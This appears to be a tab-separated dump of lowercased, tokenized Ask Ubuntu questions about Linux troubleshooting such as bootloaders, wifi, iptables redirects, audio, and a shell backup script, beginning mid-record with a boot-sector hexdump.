77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.f.f ... ... ..| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |.. , ... ... } ..| ... | 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 | ... } ... } ... ... ..| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~ ... . .fj.fp.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |sfh ... ..b.v @ ... .| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fxfxfxfx.3f ; f.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..n.f ... .| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f ... .v ... .v| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f | @ ... ... ... ... fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |.t ... ..f @ iu..boo| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |tmgr ... ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 4d 65 | ... ... ... ... ..me| 000001b0 64 69 65 6e 66 65 68 6c 65 72 ff 0d 0a 4e 65 75 |dienfehler ... neu| 000001c0 73 74 61 72 74 3a 20 54 61 73 74 65 20 64 72 81 |start : taste dr.| 000001d0 63 6b 65 6e 0d 0a 00 00 00 00 00 00 00 00 00 00 |cken ... ... ... ... | 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 ac 01 bb 01 00 00 55 aa | ... ... ... ... ..u.| 00000200 ========= devices which do n't seem to have a corresponding hard drive : ========= sdc sdd sde sdf sdg =============================== stderr messages : =============================== cat : /tmp/bootinfo-eo3hpolx/tmp_log : no such file or directory i also tried to add the partition but it leads me always to the message : no such partition ... what am i doing wrong ?
521150	redirect iptables to apache without internet connection	i have set up a personal hotspot using hostapd . but this hotspot is not connected to the internet but i do have apache installed on it . what i am trying to achieve is to redirect all the clients ( that are connected to my hotspot ) to my apache page when they visit another website . so basically redirect all traffic to my apache page . what i have tried is : sudo iptables -t nat -a prerouting -p tcp -- dport 80 -j dnat -- to-destination 192.168.150.1:80 but with this iptable the clients only get redirected to my apache webpage when i share an internet connection with my hotspot . but without the internet connection they do not get redirected . also tried : sudo iptables -t nat -a output -p tcp -- dport 80 -j dnat -- to-destination 192.168.150.1:80
521151	why ca n't sabnzbd assign a port	i 'm attempting to run sab on a new ubuntu 14.04 box . but it wo n't start , always failing with 'error : [ errno 99 ] can not assign requested address ' no matter the user or port i start with . even root gets denied . i know that the typical answer is that the port is taken but it does n't appear to be so : hofo @ pellmell : ~ $ sudo netstat -anltp | grep `` listen '' tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen 6947/smbd tcp 0 0 0.0.0.0:34446 0.0.0.0 : * listen 1942/plex plug-in [ tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 31419/apache2 tcp 0 0 0.0.0.0:32400 0.0.0.0 : * listen 1652/plex media ser tcp 0 0 0.0.0.0:6001 0.0.0.0 : * listen 10246/xvnc4 tcp 0 0 0.0.0.0:32469 0.0.0.0 : * listen 2449/plex dlna serv tcp 0 0 192.168.122.1:53 0.0.0.0 : * listen 2100/dnsmasq tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 1631/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 27115/cupsd tcp 0 0 0.0.0.0:62202 0.0.0.0 : * listen 2449/plex dlna serv tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen 6947/smbd tcp 0 0 0.0.0.0:50176 0.0.0.0 : * listen 2828/plex plug-in [ tcp6 0 0 : ::139 : : : * listen 6947/smbd tcp6 0 0 : ::5901 : : : * listen 10246/xvnc4 tcp6 0 0 : ::22 : : : * listen 1631/sshd tcp6 0 0 : ::445 : : : * listen 6947/smbd any ideas what i should look at next ?
521152	help me to recover from grub rescue prompt	i had ubuntu and windows 7 dual boot now i formatted the whole hdd and installed only kubuntu the bootloader i installed in sda1 /boot 500mb but now i 'm stuck in grub rescue prompt now what to do ?
521153	hdmi mirroring/hdmi-1 and no audio problem:	the audio comes from my laptop not from the tv . i am with idt high-definition audio . aplay -l : **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : 92hd75b3x5 analog [ 92hd75b3x5 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 1 : 92hd75b3x5 digital [ 92hd75b3x5 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 volume control : and when i click on mirroring/hdmi-1 it mirrors it goes to the tv but it is cuted around the right and the bottom screen border , cant see all the menus ( close , minimize , maximize ) , the ribbon with opened apps and etc . when i click print screen it all shows on the image and that happends and on the tv and on my laptop 's screen .
521155	zip files corrupt - possibly missing header	i have some zip files , most of which extract , but some do not . an example of one can be found here : https : //mega.co.nz/ # ! bsxzvabt ! 3f3nn-deonxys5q8_8by3huxtmx9ymfshwr07awglye looking at the files in a hex editor , it appears to me that the headers are missing for the corrupt zips . the valid zips all have headers declaring the file , but the corrupt ones do n't . running : zip -ffv bulilima_east_n-z.zip -- out fixed.zip says it can find the end record , but not the beginning , thus it can not tell where the file in the archive begins . trying to unzup returns the error : file # 1 : bad zipfile offset ( local header sig ) : 0 does anyone know how these zips could be salvaged in any way ?
521156	ubuntu server downloading dropbox directory	how would i download a dropbox folder without downloading dropbox to my ubuntu server ? cause dropbox can send links but i cant figure out how to download it as a zip
521157	how to allow writing to other users home folder	i got webserver where i have created new user for each subdomain . how do i set so i could write to those subdomain users homefolder without using sudo ( etc . using sftp .. ) 1 ) my admin user belongs to group sub-domain-org 2 ) subdomains homefolders permissions from ls -alf drwxrwxr-x 4 sub-domain-org sub-domain-org 4096 sep 7 16:39 ./ drwxr-xr-x 17 root root 4096 sep 7 16:39 ../ -rwxrwxr -- 1 sub-domain-org sub-domain-org 220 sep 7 16:39 .bash_logout* -rwxrwxr -- 1 sub-domain-org sub-domain-org 3637 sep 7 16:39 .bashrc* -rwxrwxr -- 1 sub-domain-org sub-domain-org 675 sep 7 16:39 .profile* drwxrwxr-x 2 sub-domain-org sub-domain-org 4096 sep 7 16:51 public_html/ drwxrwx -- - 2 sub-domain-org sub-domain-org 4096 sep 7 16:39 .ssh/ i 'm kinda afraid there are some hidden black magic or some security feature which prevents me to doing this ( which would be odd , since nginx works fine using user www-data , which also belongs to group sub-domain-org )
521160	wifi not working after suspend	i have notebook lenovo z500 , his wireless hw : centrino wireless-n 2230 ( vendor - intel ) . when i close the lid notebook suspends and when it is woken up wifi is disabled and there is no way to enable it . rfkill says that it is hardware blocked . i 've tried to restart network manager , added iwlwifi module to suspend_modules in /etc/pm/config.d/config , but only rebooting helps . on win 7 everything is fine . are there any ways to solve this problem ? it 's very annoying . my ubuntu version is 14.04 lts lsmod | grep wmi output : snd_rawmidi 30144 1 snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd 69238 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi thanks in advance
521161	is there a downloader alternative for express files	is there a software that download films and games and so on for ubuntu as that of win ( express files ) ? ? and does all .exe extensions ca n't work on ubuntu ? !
521163	how to view desktop icons on elementary os	how can i show the desktop icons at the desktop i'am using elementary os luna i tried gnome-tweak-tool and gconf-editor but its did n't worked i need some help please thanks ^_^
521166	btrfs subvolume @ home not mounted kernel upgrade 13.17	i 'm having trouble upgrading my kernel to the latest 13.17 rc3 mainline kernel . i 'm currently on a patched kernel 13.13 for my acer chromebook c720p , the 13.17 kernel would give me support for touchpad and touch screen out-of-the-box . when i boot the new kernel the btrfs @ home subvolume is not found , i can boot without my home folder and use the guest account or tty2 , but why is my home folder not recognised ? and how can i mount it ? need some help figuring this out , i 'm new to working with btrfs . when i boot my 13.13 kernel again everything is fine again.. here are some config files.. fstab uuid=42f4b88c-b4a7-45b5-b665-d74623bc351d / btrfs noatime , discard , ssd , autodefrag , compress=lzo , space_cache , subvol= @ 0 1 # /boot was on /dev/sda2 during installation uuid=18d97557-fdbd-4359-b99f-7587f8c0add3 /boot ext4 noatime , defaults 0 2 # /home was on /dev/sda3 during installation uuid=42f4b88c-b4a7-45b5-b665-d74623bc351d /home btrfs noatime , discard , ssd , autodefrag , compress=lzo , recovery , clear_cache , subvol= @ home 0 2 grub recordfail savedefault load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 18d97557-fdbd-4359-b99f-7587f8c0add3 else search -- no-floppy -- fs-uuid -- set=root 18d97557-fdbd-4359-b99f-7587f8c0add3 fi linux /vmlinuz-3.17.0-031700rc3-generic root=uuid=42f4b88c-b4a7-45b5-b665-d74623bc351d ro rootflags=subvol= @ quiet splash elevator=noop intel_pstate=enable $ vt_handoff initrd /initrd.img-3.17.0-031700rc3-generic
521169	accidently deleted windows 7 while installing ubuntu	i installed ubuntu to days ago.while installing i select 3rd option that is manually partition instead of windows along side at that time i do n't care about my win 7.but now there are several important documents.can you please suggest that any way to recover my old windows 7
521170	conky transparancy and refresh issue	i recently upgraded from 12.04 tot 14.04 , gnome flashback compiz . conky tranparant behaves abnormally now and i ca n't fix it . transparency turned off , conky acts normally . transparency turned on , it is as if upon each refresh , the previous layer is n't removed , so they stack onto eachother . see screenshots : no transparency : transparant : normal : i 've tried all sorts of combinations of the relevant section in .conkyrc but to no avail ... relevant lines in .conkyrc : # # create own window in instead of using desktop ? # own_window yes own_window_transparent yes # own_window_type normal own_window_type override own_window_class conky-semi # own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager # # # # # # some distros also require the following 2 lines . # # own_window_argb_visual yes # own_window_argb_value 0 i 've recently noticed it 's variable : it always does this right after startup or 'conky ' in terminal , but after a while it stops ( so conky 's normal ) , but then after a variable time interval , the 'stacking ' starts again ... nb the more i look at it , the more i think it could be a window compositing or window manager and not a conky issue . strange , because apart from the conky refresh issue , the system is running flawlessly ( so far ... ) thanks for any help
521171	time keeps changing between bios/windows 7/ubuntu 14.04	when i boot into windows 7 , the time maybe for example set to 3:04 pm . the real time being 11:04 am . then i reboot and go into ubuntu and the time is set to 7:04 am . with the same date in both . i go into bios and windows syncs it with the time it believes it is so it 'll be set to 3:04 pm . i 've tried changing them all to the right time . turning off online sync with both . and disabling utc in ubuntu with command $ sudo hwclock -- localtime nothing has worked .
521172	shared folder in ubuntu to windows 7	i successfully shared a folder from windows 7 to ubuntu ( in virtual box ) but now i want to know how to share ubuntu ( in virtual box ) to windows 7 using a command like this : net use x : \\vboxsvr\share name how can i do it ?
521173	ca n't to install ubuntu on free space	i am installing ubuntu 14 in the free space i have allocated . first of all i am creating a swap area from that free space after that the free space is changing into a unusable space to which i am unable to install ubuntu . so , please help . http : //www.techno.x10host.com/partition.jpg
521175	customizing unity tricks overlay and make it compatible with gnome	as you now when i hold the super key in unity , shortcuts will appear like below : but this features does n't work on gnome enviroments . now there are some questions : how can i run it in gnome and show this overlay by pressing super or another key ? how can i customize it ? i want to change some text . is there any config file for it ?
521176	files behavior with respect to a secondary hard drive	by `` files '' , i mean the program files . i store the vast majority of my documents on a second hard drive . suppose i have files opened up to my documents in this hard drive , except the window is buried below some other ones . on the left panel of icons , i can see an arrow indicating that files is open . however clicking on the files icon , instead of taking me to my already open files window , it instead launches a new one opening to my home folder . this means that i either renavigate to my secondary hard drive , or i have to move/minimize various windows to dig out my already opened files window . this behavior does not occur when files is opened up to something on my primary hard drive ( where ubuntu is installed ) . here when i click on the files icon , it brings up the already opened window . is this a known bug ? a known feature ? i 've had trouble searching to see if others have asked about this , and i think that 's mostly due to the name `` files '' .
521178	what does the head : property do on page { } in qml ?	i have an app that i am trying to get the toolbar in the header to work . in the documentation i 've noticed a property called head that seems to create and add items to the header toolbar . what is the difference between this and the toolbaritems ? also , related , in trying to use this head property , i get the error : can not assign to non-existent property `` head '' ( similar to question why am i getting the error â can not assign to non-existent property âhead '' ? ) which one is the correct ( or better ) way ? thank you randy
521180	raid drive not detected by lubuntu installer	i wanted to install lubuntu on a old computer : a p4c 2.53ghz asus p4pe 2go ram with a wd raptor 36go ( sata ) as system disk and a maxtor damondmaxplus8 40go ( uata ) . currently mageia 4 is installed into the raptor which i want to replace with lubuntu 14.04.1 . i do not want erase the data in the maxtor . this motherboard uses an intel ich4 which does not supports sata , but it have an additional controller onboard ( promise fastrack 376 ) for sata/pata raid . when booting from install cd , choosing `` try lubuntu first '' , everything is ok , drives are detected correctly : if i go on gparted or into the disks utility or into the system profiler , disks and controller are detected correctly : ide interface : intel corporation 82801db ( ich4 ) ide controller ( rev 02 ) ( prog-if 8a [ master secp prip ] ) raid bus controller : promise technology , inc. pdc20376 ( fasttrak 376 ) ( rev 02 ) scsi disks : ata maxtor 6e040l0 tsstcorp cd/dvdw sh-s182m ata wdc wd360gd-00fn the maxtor is shown as sda and the raptor as sdb . but when i launch `` install lubuntu 14.04.1 lts '' the intaller says me that it did not detected any os , and if i choose `` do something else '' the installer does not show me the raptor ( sdb ) , only the maxtor drive is showed . is there a way to install lubuntu on a drive connected to the promise sata raid controller or to force the install on sdb ?
521181	gtx860m/rog asus g750jm fans max on reboot	okay , on my own i discovered that following the instructions that i listed here : ubuntu and asus g750jm , gtx860m / nvidia problems my graphics card would work with my g750jm and it 's gtx860m . but occasionally , or maybe to be more accurate rarely when i reboot ubuntu , both the gpu and processor fans go full blast as it shuts down . they do n't stop no matter what i do , except powering off . i can go into windows , go back into ubuntu , reboot endlessly . they just keep running . any ideas or suggestions i could work with to fix this ? anyone ever had this problem before , it may not be related to the graphics driver but that 's when i noticed it .
521182	unetbootin issues	i just built a computer , i am trying to install ubuntu 14.04 live x64 , although i am having some issues . when i boot from the drive , it gives me the try ubuntu , install , check memory menu but when i try to install it says switching back to text console than turns off my screen . i am hoping its an issue that is with the way i am installing it . could it be that my parts are n't compatible ? p.s . computer works fine , i am able to enter bios easily , everything lights up
521184	spideroak deletion	i 've today been looking into spideroak for cloud storage , downloaded it , then decided that it was n't for me d'oh ! trouble is , it 's become like a chuffin virus all over my machine - running ubuntu 14.04 and have tried to delete it but wo n't let me and does n't show when i try to list the software on my machine . however i can see all the various files when i search on computer , and they seems to be located everywhere , usr , etc , opt , var . just wondered if there is some kind of terminal generic command to try and rid myself of the cr*p ?
521188	setting up wireless ( wpa2 ) on ubuntu server 14.04	to start off with , i 'm really new to using linux so , if possible , be descriptive in your responses . i really want to learn but do n't have a big knowledge-base on the subject . i 'm sorry if i missed to provide some information that i should have to be able to get decent feedback , i 'm really trying ^_^ hardware : pci wireless card : 00:08.0 network controller [ 0280 ] : ralink corp. rt2500 wireless 802.11bg [ 1814:0201 ] rev 01 i 'm trying to setup a home server for git/atlassian/dlna streaming/torrenting/ ... usage and want to use the ubuntu 14.04 server . i 've installed the server and am currently trying to connect it to my wireless network , this is the first thing i 'm trying and i 'm already failing horribly.. the first thing i tried was checking if i could actually find my wireless network : sudo iwlist wlan0 scan wlan0 no scan results i then tried to configure my networking file and based it on the information i got from my windows laptop wireless configuration ( only necessary stuff inclided ) : standaardgateway . . . . . . . . . : fe80 : :5e35:3bff : fe20:930a % 11 192.168.0.1 dhcp-server . . . . . . . . . . . : 192.168.0.1 dns-servers . . . . . . . . . . . : 2a02:1800:100 : :42:2 2a02:1800:100 : :42:1 195.130.131.130 195.130.130.2 zoeklijst voor verbindingsspec . dns-achtervoegsels : telenet.be so i used sudo nano /etc/network/interfaces to setup the file as : auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 192.168.1.150 netmask 255.255.255.0 gateway 192.168.0.1 ( also tried 192.168.1.1 ) wpa-ssid myssid wpa-psk mypassword dns-nameservers 195.130.131.130 195.130.130.2 ( from the windows config ) then making the machine use the new settings : sudo ifdown wlan0 & & sudo ifup -v wlan0 i get : ... wpa_supplicant : configuring network blaock -- 0 wpa_supplicant : wpa-ssid `` myssid '' -- ok wpa_supplicant : wpa-pask *** -- ok wpa_supplicant : enabling network block 0 -- ok ip addr add 192.168.1.150/255.255.255.0 broadcast 192.168.1.255 dev wlan0 label wlan0 rtnetlink answers : file exists failed to bring up wlan0 hope you guys can help me !
521189	pdf are printed as black page	i succeded in getting working my canon lbp6000 on xubuntu 14.04 . ( following the instructions in this answer ) . now the printer works almost fine . my problem is that pdf files are printed as black pages . more precisely , the output is a black rectangle sormounted by some fuzzy lines . it happens independently of the pdf reader i try to use ( built-in chromium reader or evince ) . i tried printing pdf into another pdf and the result is fine . ghostscript is correctly installed and test pages are correctly printed too . other filetypes like djvu are correctly printed , so it appears as a specifically pdf issue . does anyone know how to fix this issue ? updates . also postscript files behave like pdf .
521190	bluetooth disabled and not showing up in lspci - asus g750jm	the modem installed properly on 14.04 , it worked on installation of ubuntu . it 's a broadcom modem , and it 's tied into the broadcom bluetooth card . but the bluetooth does not function on 14.04 . ubuntu says it 's disabled what can i do to fix this ? it does n't say that it 's not there , it just says disabled even after i turn it on . rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : asuswlan : wireless lan soft blocked : no hard blocked : no 3 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no update : i removed asus-bluetooth 's soft block by running the following commands : $ sudo modprobe -b asus-wmi $ rfkill unblock all but it 's still disabled in settings and i ca n't use it and it returns to being disabled after a short time update : $ hcitool scan device is not available : no such device $ lsmod | grep asus asus_nb_wmi 16990 0 asus_wmi 24191 1 asus_nb_wmi sparse_keymap 13948 1 asus_wmi wmi 19177 2 mxm_wmi , asus_wmi video 19476 2 i915 , asus_wmi update : $ lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d5 ) 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d5 ) 00:1c.4 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 5 ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm87 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 01:00.0 3d controller : nvidia corporation gm107m [ geforce gtx 860m ] ( rev ff ) 03:00.0 network controller : broadcom corporation bcm4352 802.11ac wireless network adapter ( rev 03 ) 04:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) am i to assume that since it does n't list bluetooth anywhere in that list that ubuntu just does n't realize that i have a bluetooth device ? it would explain why i 've tried virtually everything to enable it but it wo n't work . please help .
521191	problems installing xubuntu	i tried to install xubuntu , but strange things happened . i am a newbie so bear with me . the first time i started xubuntu and spent time with the desktop environment that i like better than unity . after the second boot , things went really bad . xubuntu desktop came back completely different : there was no menu to open programs , firefox opened automatically but without the menu bar ( file , edit ... ) and i could not move the firefox window around . all new windows opened on top of the firefox window and they too couldn't be moved or have their size changed . i uninstalled xfce using this : sudo apt-get -f install sudo apt-get clean sudo apt-get autoclean sudo apt-get update sudo apt-get purge xfce4 and xubuntu using instructions from how to remove xubuntu-desktop ? to try to do a clean reinstall , but no matter what i do , i still end up with the same buggy desktop .
521192	how to use folder with wildcards and spaces in find command in script	i want to use find to find files in a set of folders restricted by wildcards , but where there are spaces in the path name . from the command line , this is easy . the following examples all work . find te*/my\ files/more -print find te*/'my files'/more -print find te*/my ' 'files/more -print these will find files in , for example , terminal/my files/more and tepid/my files/more . however , i need this to be part of a script ; what i need is something like this : search='te*/my\ files/more' find $ { search } -print unfortunately , whatever i do , i do n't seem to be able to mix wildcards and spaces in a find command within a script . the above example returns the following errors ( note the unexpected doubling of the backslash ) : find : ‘te*/my\\’ : no such file or directory find : ‘files/more’ : no such file or directory trying to use quotes also fails . search= '' te*/'my files'/more '' find $ { search } -print this returns the following errors , having ignored the meaning of the quotes : find : ‘te*/'my’ : no such file or directory find : ‘files'/more’ : no such file or directory here 's one more example . search='te*/my files/more' find $ { search } -print as expected : find : ‘te*/my’ : no such file or directory find : ‘files/more’ : no such file or directory every variation that i 've tried returns an error . i have a workaround , which is potentially dangerous because it returns too many folders . i convert all spaces to a question mark ( single-character wildcard ) like this : search='te*/my files/more' search= $ { search// / ? } # convert every space to a question mark . find $ { search } -print this is the equivalent of : find te*/my ? files/more -print this returns not only the correct folders but also terse/myxfiles/more , which it 's not supposed to . how can i achieve what i 'm trying to do ? google has not helped me : ( tia
521193	how to retrieve file lost by the 'move ' command	i was moving a tar file from the disk . unfortunately , i misspelled the path , and i lost the file ubuntu . shell > sudo mv /media/creator/sumeeth/software/apache-tomee-1.7.0-plus.tar.gz /~
521194	is this solution solve dns leak ( tor proxy ) ?	i was looking for a way to solve the dns leak problem while using tor socks proxy ( with firefox ) , i found a solution that is adding `` dnsport 53 '' into torrc . then adding `` nameserver 127.0.1.1:53 '' into resolv.conf . is this enough ? also can my ip get leaked ( using tor socks proxy in firefox not tor browser ) ?
521198	i 've tried ubuntu for a while and want windows back	i have tried ubuntu for a while , and now i want windows back . but when i put in my usb stick that i have made bootable , it is like the computer ca n't find it . i just come into a menu that asks me if i want to start `` ubuntu or advanced settings '' or something like that . when i installed it i chose to make the disk full-encrypted . do you think that is the reason the computer ca n't boot the usb stick ?
521199	how to install .bundle packages in ubuntu	i recently download a package with .bundle extension . it 's vmware-player-6.0.3-1895310.x86_64.bundle . i want to install vmware-player but when i open that , it opens on text editor .
521202	make the ctrl and super/cmd keys behave like on os x	i am a longtime os x user who is using ubuntu at work . while i like ubuntu very much , something that i really miss is the behavior of the ctrl & cmd ( i.e . super ) keys on os x : cmd/super is used for most gui shortcuts , such as copy/pasting , closing windows , ... ctrl is mainly used for entering control keys in the terminal , i.e . ctrl+c generates a sigint . while working in a terminal i can still use the same shortcuts for copying and pasting . i find this immensely practical . on ubuntu i have to use the mouse and the contextual menu . is there any way i can make these keys behave like on os x ?
521207	`` syntax error : unterminated quoted string ''	i am trying to use a backup script that will backup my sql database and website files . i am running ubuntu 12.04 32 bit version and zpanel . here is what my db structure is along with which db i want to backup : in my script i also did not know what to put in at : mysql= '' $ ( ) '' mysqldump= '' $ ( ) '' gzip= '' $ ( ) '' so i just put my db name in for the first two and .gz in the third one . here is the script : # ! /bin/sh # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # daily backup routine - backup and sync to dropbox # this script creates a backup using today 's date , then deleted # any backups made 3 days ago . if run every day it will ensure # you have a week 's worth of backups of your mysql databases and # zpanel web directories . # # uses whatever dropbox account is running on the server . # # written by richard ferreira for the backup of zpanel websites . # contact me - richard [ at ] beetle001.com # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # before we get started , we should set some parameters . we 'll need these for later . # the webserver 's datafiles : webdir= '' /var/zpanel/hostdata/ '' # where do we want the backup to go ? ( set this - it 's a temp folder ) backup= '' /root/backup-temp '' # where is our dropbox folder ? ( set this to your absolute backup path ) dropbox= '' /root/dropbox/backups # what do we want our date to look like ? now= $ ( date + '' % d- % m- % y '' ) # we need to know the date 3 days ago to purge any backups that were made 3 days ago . # this ensures we do n't keep unnecessarily old backups . # it does n't matter if it skips one every now and then - we 'll just have to check manually from time to time . # if you want to keep more days backups , change the `` 3 days ago '' to `` x days ago '' daysago= $ ( date -- date= '' 3 days ago '' + '' % d- % m- % y '' ) # what should our file backup look like ? webfile= '' webdirs-full- $ now.tar.gz '' # our mysql login information and some paths ( we 'll use 'which ' to make sure we get them ) : sqluser= '' root '' # do n't forget to change the root password here ! sqlpass= '' xxxxxxxxxxxx '' sqlhost= '' localhost '' mysql= '' $ ( dogeboosting ) '' mysqldump= '' $ ( dogeboosting ) '' gzip= '' $ ( .gz ) '' # # let 's just , for sanity 's sake , make sure our temp backup folder exists . mkdir $ backup # do n't edit anything below this line # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # now let 's start ! # let 's get the databases that we want to backup . dbs= '' $ ( $ mysql -u $ sqluser -h $ sqlhost -p $ sqlpass -bse 'show databases ' ) '' # now let 's dump them to .sql files and put them in our backup directory . for db in $ dbs do file= $ backup/mysql- $ db. $ now.gz $ mysqldump -u $ sqluser -h $ sqlhost -p $ sqlpass $ db | $ gzip -9 > $ file done # # let 's shove the whole webserver directory into a tarball and throw that in with the sql files : tar -zcvf /root/backup/ $ webfile $ webdir # that 's all done - we should put the backups on copy by putting them into our copy folder . # first let 's make a folder for today . mkdir $ dropbox/ $ now # copy our backups into it . cp -r $ backup/* $ dropbox/asterix/ $ now # we can delete the backup we made 3 days ago from copy now . rm -rf $ dropbox/ $ daysago # and clear out the temporary director for next time . rm $ backup/* # job well done ! # have a beer and relax ! here is my problem : when i try to run the script i get this error : ./backup.sh : 66 : ./backup.sh : syntax error : unterminated quoted string if anyone could help me with this would appreciate it alot !
521208	ca n't skype for ubuntu 12 work on ubuntu 14 ?	i 've installed ubuntu 14 , but i ca n't install skype as the required version of ubuntu is 12 ! ? is there a way to run skype on ubuntu 14 ?
521210	why does backup fail with permission denied ( in /var/backups ) ?	my backup fails and shows this message : permission denied when trying to create ‘/var/backups/duplicity-full.20140907t165614z.vol1.difftar.gpg’ how do i remedy this ?
521211	help : can i run minecraft on a samsung ( arm ) chromebook ?	i am trying to run minecraft on a samsung ( arm ) chromebook ( series 3 ) . the error is can not run i386 on arm bit platform or something along those lines . i am running xfce4 as a desktop environment any help here ?
521214	bug : soft lockup - cpu # 3 stuck for 22s ! [ kworker/3:1:69 ]	i 'm new on linux thing . for my first experience i choosed ubuntu . my notebook is a dell vostro 3500 with an intel i5 processor , 4 gb of ram and an nvidia 310m as graphic chipset . i downloaded the certified version of ubuntu to my old notebook , ubuntu 12.04 lts 64-bit ( from this url : http : //www.ubuntu.com/certification/hardware/201004-5574/ ) and i have installed it . when it finished it offers to me to upgrade to 14.04 . after the 14.04 installation , i can not use it . it freezes every time i try to load . when i press ctrl + alt + f2 , before enter with the password at login , i 'm having many bug messages and the computer does not respond . the message says : bug : soft lockup - cpu # 3 stuck for 22s ! [ kworker/3:1:69 ] i 've tryed to install a fresh ubuntu 14.40 version but the problem is the same . when i use it with livecd everything works fine . ! here follows the image . http : //www.pedroleo.com.br/ubuntu1404.jpg here follows the boot.log content . stopping adjust system clock and timezone [ 122g [ ok ] starting read required files in advance [ 122g [ ok ] starting mount filesystems on boot [ 122g [ ok ] starting fix-up sensitive /proc filesystem entries [ 122g [ ok ] starting populate /dev filesystem [ 122g [ ok ] starting populate and link to /run filesystem [ 122g [ ok ] stopping populate /dev filesystem [ 122g [ ok ] stopping fix-up sensitive /proc filesystem entries [ 122g [ ok ] stopping populate and link to /run filesystem [ 122g [ ok ] stopping track if upstart is running in a container [ 122g [ ok ] starting initialize or finalize resolvconf [ 122g [ ok ] starting set console keymap [ 122g [ ok ] starting signal sysvinit that virtual filesystems are mounted [ 122g [ ok ] starting signal sysvinit that virtual filesystems are mounted [ 122g [ ok ] starting set sysctls from /etc/sysctl.conf [ 122g [ ok ] starting bridge udev events into upstart [ 122g [ ok ] starting signal sysvinit that remote filesystems are mounted [ 122g [ ok ] starting device node and kernel event manager [ 122g [ ok ] starting load modules from /etc/modules [ 122g 